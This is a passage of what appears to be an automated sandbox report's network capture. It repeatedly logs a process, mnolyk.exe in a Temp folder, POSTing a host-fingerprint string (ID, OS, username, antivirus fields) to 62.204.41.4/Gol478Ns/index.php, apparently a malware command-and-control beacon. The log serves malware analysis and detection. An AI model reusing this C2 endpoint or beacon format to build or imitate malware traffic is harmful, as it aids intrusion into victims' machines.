                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:30.623967886 CET214INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            250192.168.2.44994562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:37.668634892 CET439OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:37.734601021 CET439INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            251192.168.2.44994662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:37.915360928 CET440OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:37.981039047 CET440INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            252192.168.2.44994762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:38.153086901 CET441OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:38.219619036 CET441INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            253192.168.2.44994862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:38.400423050 CET442OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:38.465370893 CET442INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            254192.168.2.44994962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:38.632550001 CET443OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:38.698424101 CET443INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            255192.168.2.44995062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:38.867192030 CET444OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:38.931837082 CET444INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            256192.168.2.44995162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:39.117122889 CET445OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:39.184155941 CET445INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:39 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            257192.168.2.44995262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:39.350317001 CET445OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:39.413841963 CET446INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:39 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            258192.168.2.44995362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:39.587593079 CET447OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:39.652129889 CET447INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:39 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            259192.168.2.44995462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:39.826366901 CET448OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:39.895251036 CET448INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:39 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            26192.168.2.44972162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:31.055128098 CET215OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:31.121349096 CET215INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            260192.168.2.44995562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:40.070472002 CET449OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:40.136811018 CET449INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            261192.168.2.44995662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:40.308350086 CET450OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:40.374418974 CET450INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            262192.168.2.44995762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:40.557977915 CET451OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:40.624577045 CET451INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            263192.168.2.44995862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:40.811347008 CET452OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:40.875916958 CET452INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            264192.168.2.44995962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:41.059223890 CET453OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:41.125665903 CET453INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            265192.168.2.44996062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:41.382110119 CET454OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:41.445076942 CET454INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            266192.168.2.44996162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:41.634573936 CET455OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:41.698961020 CET455INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            267192.168.2.44996262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:41.870044947 CET456OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:41.935138941 CET456INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            268192.168.2.44996362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:45.131886005 CET457OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:45.198563099 CET457INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            269192.168.2.44996462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:45.382356882 CET458OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
